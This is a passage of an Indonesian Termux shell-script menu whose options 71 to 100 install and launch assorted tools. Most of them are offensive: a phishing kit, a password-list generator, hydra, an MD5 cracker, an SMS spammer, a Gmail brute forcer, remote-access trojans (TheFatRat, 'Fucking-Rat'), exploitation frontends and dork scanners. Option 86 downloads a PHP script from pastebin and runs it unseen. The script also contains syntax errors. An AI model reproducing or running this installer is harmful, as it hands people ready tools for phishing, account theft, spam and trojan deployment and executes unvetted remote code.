echo "\033[33;1mUntuk Tutorial Kunjungi:" "\033[36;1mhttps://youtu.be/LU0QMstAI88"
sleep 5
pkg install php
pkg install python2
pkg install git
pkg install curl
git clone https://github.com/Lexiie/SocialFish.git
mv SocialFish $HOME
cd $HOME/SocialFish
pip2 install wget
python2 SocialFish.py
fi

if [ $kzy = 72 ] || [ $kzy = 72 ]
then
clear
toilet -f standard -F gay "KZy29"
pkg install moon-buggy
moon-buggy
fi

if [ $kzy = 73 ] || [ $kzy = 73 ]
then
clear
toilet -f standard -F gay "KZy29"
echo "\033[33;1mUntuk Tutorial Kunjungi:" "\033[36;1mhttps://youtu.be/yIf57xxWaoI"
sleep 5
pkg install git
pkg install python2
git clone https://github.com/mebus/cupp.git
mv cupp $HOME
cd $HOME/cupp
python2 cupp.py
fi

if [ $kzy = 74 ] || [ $kzy = 74 ]
then
clear
toilet -f standard -F gay "KZy29"
echo "\033[33;1mUntuk Tutorial Kunjungi:" "\033[36;1mhttps://youtu.be/F2hjIGg4RtI"
sleep 5
pkg install python2
pkg install python
pkg install php
pkg install hydra
fi

if [ $kzy = 75 ] || [ $kzy = 75 ]
then
clear
toilet -f standard -F gay "KZy29"
pkg install git
pkg install python2
git clone https://github.com/CiKu370/md5-crack.git
mv md5-crack $HOME
cd $HOME/md5-crack
python2 md5.py
fi

if [ $kzy = 76 ] || [ $kzy = 76 ]
then
clear
toilet -f standard -F gay "KZy29"
echo "\033[33;1mUntuk Tutorial Kunjungi:" "\033[36;1mhttps://youtu.be/I5yMLbjvhiY"
pkg install python2
pkg install php
pkg install cowsay
pkg install toilet
pkg install ruby
gem install lolcat
pkg install git
git clone https://github.com/4L13199/LITESPAM.git
mv LITESPAM $HOME
cd $HOME/LITESPAM
sh LITESPAM.sh
fi

if [ $kzy = 77 ] || [ $kzy = 77 ]
then
clear
toilet -f standard -F gay "KZy29"
pkg install python
pkg install git
pkg install php
git clone https://github.com/Cvar1984/pemulungBTC.git
mv pemulungBTC $HOME
cd $HOME/pemulungBTC
php autoload.php
php mulung.php
fi

if [ $kzy = 78 ] || [ $kzy = 78 ]
then
clear
toilet -f standard -F gay "KZy29"
pkg update && pkg upgrade
pkg install git 
pkg install python2
git clone https://github.com/ciku370/ko-dork.git
mv ko-dork $HOME
cd $HOME/ko-dork
python2 dork.py
fi

if [ $kzy = 79 ] || [ $kzy = 79 ]
then
clear
toilet -f standard -F gay "KZy29"
pkg install neofetech
neofetech
fi

if [ $kzy = 80 ] || [ $kzy = 80 ]
then
clear
toilet -f standard -F gay "KZy29"
pkg install python2
pkg install git
git clone https://github.com/CiKu370/lhst
mv lhst $HOME
cd $HOME/lhst
python2 lhst.py
fi

if [ $kzy = 81 ] || [ $kzy = 81 ]
then
clear
"KZy29"
sleep 1
apt-get update && apt-get upgrade
apt-get install git
git clone https://github.com/Screetsec/TheFatRat.git
mv TheFatRat $HOME
cd $HOME/TheFatRat
chmod +x setup.sh 
./setup.sh
fi

if [ $kzy = 82 ] || [ $kzy = 82 ]
then
clear
toilet -f big -F gay "KZy29 " | lolcat
sleep 1
echo -e $green "Sedang Menginstall"
sleep 1
apt-get update 
apt-get upgrade
pkg install python
apt-get install git
git clone https://github.com/Dionach/CMSmap.git
mv CMSmap $HOME
cd $HOME/CMSmap
ls
fi

if [ $kzy = 83 ] || [ $kzy = 83 ]
then
clear
toilet -f big -F gay " KZy29" | lolcat
sleep 1
apt update && apt upgrade
apt install git
apt install wget
apt install proot
git clone https://github.com/Neo-Oli/termux-ubuntu.git
mv termux-ubuntu $HOME
cd $HOME/~/termux-ubuntu
chmod +x ubuntu.sh
sh ubuntu.sh
fi

if [ $kzy = 84 ] || [ $kzy = 84 ]
then
clear
toilet -f big -F gay " KZy29 "
sleep 1
apt update && apt upgrade
apt install wget
mkdir ngrok
cd ~/ngrok
wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-arm.zip
mv ngrok-stable-linux-arm.zip $HOME
$HOME/unzip ngrok-stable-linux-arm.zip
cd ~/
ls
fi

if [ $kzy = 85 ] || [ $kzy = 85 ]
then
clear
toilet -f big -F gay "KZy29"
sleep 1
apt update && apt upgrade
apt install git
git clone https://github.com/JamesAndresCM/Brute_force_gmail
mv Brute_force_gmail $HOME
cd $HOME/Brute_force_gmail
ls
fi

if [ $kzy = 86 ] || [ $kzy = 86 ]
then
clear
toilet -f big -F gay "KZy29"
sleep 1
apt update && apt upgrade
pkg install php
pkg install wget
wget https://pastebin.com/raw/sPpJRjCZ -O lokomedia.php
mv lokomedia.php $HOME
cd
php lokomedia.php 
fi

if [ $kzy = 87 ] || [ $kzy = 87 ]
then
clear
toilet -f big -F gay "KZy29" 
sleep 1
apt update 
apt upgrade
apt install git
git clone https://github.com/Hax4us/Nethunter-In-Termux.git
mv Nethunter-In-Termux $HOME
cd $HOME/Nethunter-In-Termux
chmod 777 kalinethunter
sh kalinethunter
fi

if [ $kzy = 88 ] || [ $kzy = 88 ]
then
clear
toilet -f big -F gay "KZy29" | lolcat
sleep 1
apt update 
apt upgrade
apt install git
apt install perl
git clone https://github.com/rezasp/joomscan.git
mv joomscan $HOME
cd $HOME/joomscan
ls
fi

if [ $kzy = 89 ] || [ $kzy = 89 ]
then
clear
toilet -f big -F gay "KZy29" | lolcat
sleep 1
apt update 
apt upgrade
apt install git
apt install python2
git clone https://github.com/kereh/VulnScaner
mv VulnScaner $HOME
cd $HOME/VulnScaner
python2 VulnScaner.py
fi

if [ $kzy = 90 ] || [ $kzy = 90 ]
then
clear
toilet -f big -F gay "KZy29" | lolcat
sleep 1
apt update 
apt upgrade
apt install git
apt install python2
git clone https://github.com/kereh/HN-Installer
mv HN-Installer $HOME
cd $HOME/HN-Installer
python2 HN-Install.py
fi

if [ $kzy = 91 ] || [ $kzy = 91 ]
then
clear
toilet -f big -F gay "KZy29" | lolcat
sleep 1
apt update 
apt upgrade
apt install git
apt install python2
git clone https://github.com/kereh/Fucking-Rat
mv Fucking-Rat $HOME
cd $HOME/Fucking-Rat
python2 fr.py
fi

if [ $kzy = 92 ] || [ $kzy = 92 ]
then
clear
echo -e $green" installing fedora "
sleep 1
apt update && apt upgrade
apt-get install git
apt install wget
git clone https://github.com/nmilosev/termux-fedora.git
mv termux-fedora $HOME
cd $HOME/termux-fedora
chmod +x termux-fedora.sh
sh termux-fedora.sh
fi

if [ $kzy = 93 ] || [ $kzy = 93 ]
then
clear
toilet -f big -F gay "KZy29"
sleep 1
aptupdate
apt upgrade
pkg install python
apt install git
git clone https://github.com/m4ll0k/Infoga.git infoga
sleep 1
mv infoga $HOME
cd $HOME/infoga
pip install -r req
python2 infoga.py
fi

if [ $kzy = 94 ] || [ $kzy = 94 ]
then
clear
toilet -f big -F gay "KZy29"
sleep 1
apt update
apt upgrade
apt install git
git clone https://github.com/rand0m1ze/ezsploit
mv ezsploit $HOME
cd $HOME/ezsploit
bash ezsploit.sh
fi

if [ $kzy = 95 ] || [ $kzy = 95 ]
then
clear
toilet -f big -F gay "KZy29"
sleep 1
apt update
apt upgrade
apt install python
apt install git
git clone https://github.com/maurosoria/dirsearch.git
mv  dirsearch $HOME
cd $HOME/dirsearch
ls
fi

if [ $kzy = 96 ] || [ $kzy = 96 ]
then
clear
toilet -f big -F gay "KZy29"
sleep 1
apt update 
apt upgrade
apt install git 
apt install php
git clone https://github.com/whackashoe/php-spam-mail-honeypot.git
mv php-spam-mail-honeypot $HOME
cd $HOME/php-spam-mail-honeypot
php honeypot.php
fi

if [ $kzy = 97 ] || [ $kzy = 97 ]
then
clear
toilet -f big -F gay "KZy29"
sleep 1
apt update 
apt upgrade
apt install git 
apt install php
git clone https://github.com/whackashoe/killr.git
mv killr $HOME
cd $HOME/killr
php server.php
fi

if [ $kzy = 98 ] || [ $kzy = 98 ]
then
clear
toilet -f big -F gay "KZy29"
sleep 1
apt update 
apt upgrade
apt install git 
apt install php
git clone https://github.com/whackashoe/Human_Level_Control_through_Deep_Reinforcement_Learning.git
mv Human_Level_Control_through_Deep_Reinforcement_Learning $HOME
cd $HOME/Human_Level_Control_through_Deep_Reinforcement_Learning
sh install_dependencies.sh
fi

if [ $kzy = 99 ] || [ $kzy = 99 ]
then
clear
toilet -f big -F gay "KZy29"
sleep 1
apt update 
apt upgrade
apt install git 
apt install php
git clone https://github.com/Neo-Oli/Termux-Mpv.git
mv Termux-Mpv $HOME
cd $HOME/Termux-Mpv
python2 setup.py 
fi

if [ $kzy = 100 ] || [ $kzy = 100 ]
then
clear
toilet -f big -F gay "KZy29"
sleep 1
apt update 
apt upgrade
apt install git 
apt install python
git clone https://github.com/zdresearch/OWASP-Nettacker
mv OWASP-Nettacker $HOME
cd $HOME/OWASP-Nettacker
python2 setup.py 
fi

if [ $bro = 0 ] || [ $bro = 00 ]
then
echo $blue "TEAM : BLACK CYBER CRUSH
sleep 1
echo $white "support : JUNIOR GUARDIAN TEAM"
sleep 1
echo " TERIMAKASIH SUDAH MEMAKAI TOOLS KAMI ^_^"
sleep 1
exit
fi
